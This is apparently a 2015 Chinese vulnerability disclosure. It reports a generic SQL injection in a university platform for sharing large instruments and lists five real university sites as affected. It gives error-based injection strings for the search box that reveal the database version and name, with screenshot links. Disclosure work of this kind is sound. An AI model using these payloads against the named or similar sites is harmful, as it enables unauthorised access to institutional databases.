### 简要描述:
### 详细说明:
某高校大型仪器设备开放共享管理平台通用SQL注入。
案例:
http://ies.hhit.edu.cn/ShowFiles/YQuseList.aspx
http://sjjx.jssvc.edu.cn/syjx/share/ShowFiles/YQuseList.aspx
http://dqhjsy.nuist.edu.cn/nxdyq/ShowFiles/YQuseList.aspx
http://eq.njfu.edu.cn/ShowFiles/YQuseList.aspx
http://210.38.64.109/shiyan/share/ShowFiles/YQuseList.aspx
### 漏洞证明:
注入:
http://ies.hhit.edu.cn/ShowFiles/YQuseList.aspx
[<img src="https://images.seebug.org/upload/201506/240908347736953f22aaa15c5e4698465d39b864.png" alt="QQ图片20150624085918.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/240908347736953f22aaa15c5e4698465d39b864.png)
搜索:单引号
[<img src="https://images.seebug.org/upload/201506/2409084338b0d7e5e69b2c28e22837b4db894eb2.png" alt="QQ图片20150624085934.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/2409084338b0d7e5e69b2c28e22837b4db894eb2.png)
搜索 1' and @@version=1 and '%'=' 报错曝出数据库版本
[<img src="https://images.seebug.org/upload/201506/24090852fe705fb529a82df4b4bc8f3743636001.jpg" alt="QQ图片20150624090107.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/24090852fe705fb529a82df4b4bc8f3743636001.jpg)
搜索 1' and db_name()=1 and '%'=' 报错曝出数据库表名
[<img src="https://images.seebug.org/upload/201506/24090902161ce78dd576506d7e27ee2544ce298b.png" alt="QQ图片20150624090142.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/24090902161ce78dd576506d7e27ee2544ce298b.png)
京公网安备 11010502034610号
暂无评论